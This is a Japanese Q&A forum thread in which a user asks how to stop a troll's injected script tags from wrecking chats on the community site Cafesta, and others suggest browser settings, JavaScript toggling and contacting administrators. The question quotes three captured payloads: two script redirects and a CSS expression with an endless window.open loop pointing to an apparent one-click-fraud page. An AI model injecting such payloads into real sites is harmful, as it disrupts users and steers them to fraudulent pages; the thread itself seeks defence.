- 締切済み
ブラウザで一時的に、location.hrefの命令だけを無効化したい
カフェスタというコミュニティサイトで、入力不可のスクリプトタグを使って、チャットをめちゃめちゃに破壊してしまう荒らしがいます。 その人が来たときに、あるタグを使って、部屋を壊される前に彼のソースを入手し、彼の入力したタグをみつけました。 <script>location.href="http://tanosii.client.jp/baku.html";</script> <script>location.href="http://hp.cafesta.com/toumokorosi";</script> <p style=left:expression\(for(;;){window.open("http://**movies.net/***/account/join.php");})> この3つです。 1番目と3番目は、アクセス先のページをパソコン側で制限サイトに登録すればクラッシュは防げました。 でも2番目のタグをどうすれば回避できるのかがわかりません。 location.hrefを無効にすればいいのかと思っていますが、いろいろ調べても方法は見つけられませんでした。 とても困っているので、お力をお貸ししていただけませんか。 よろしくお願いいたします。
- みんなの回答 (3)
- 専門家の回答
みんなの回答
#2 U-RIA_Plusです。 Firefoxなどでuser.js等を使って設定を弄れば無効化できるかもしれません。 可能かどうかについての保障はありませんが…。
- Kuppycat
- ベストアンサー率50% (109/216)
質問への直接な回答ではありませんが。 カフェスタの管理者に相談して、その荒らしに対応してもらうのが一番ではないでしょうか。 被害状況などメールしてみては?
>2番のブロック チャットへ入る前にJavaScriptを切ったりすることはできないのですか? 切った場合にチャットが利用できなくなるなどの問題が発生しなければ、 単純にJavaScriptを切るだけで対処できると思いますが…。 >ワンクリック詐欺 蛇足説明ですが電子消費者契約法とかプロバイダ制限責任法があるから、 画面にある内容は無効です。
補足
JavaScriptは無効にできないんです。チャットが止まってしまうようです。 ワンクリック詐欺、無効であることは承知しております。
補足
カフェスタ事務局がその荒らしに対して野放しなので、これ以上の被害拡大は防ぎたい、という思いからここで質問させていただきました。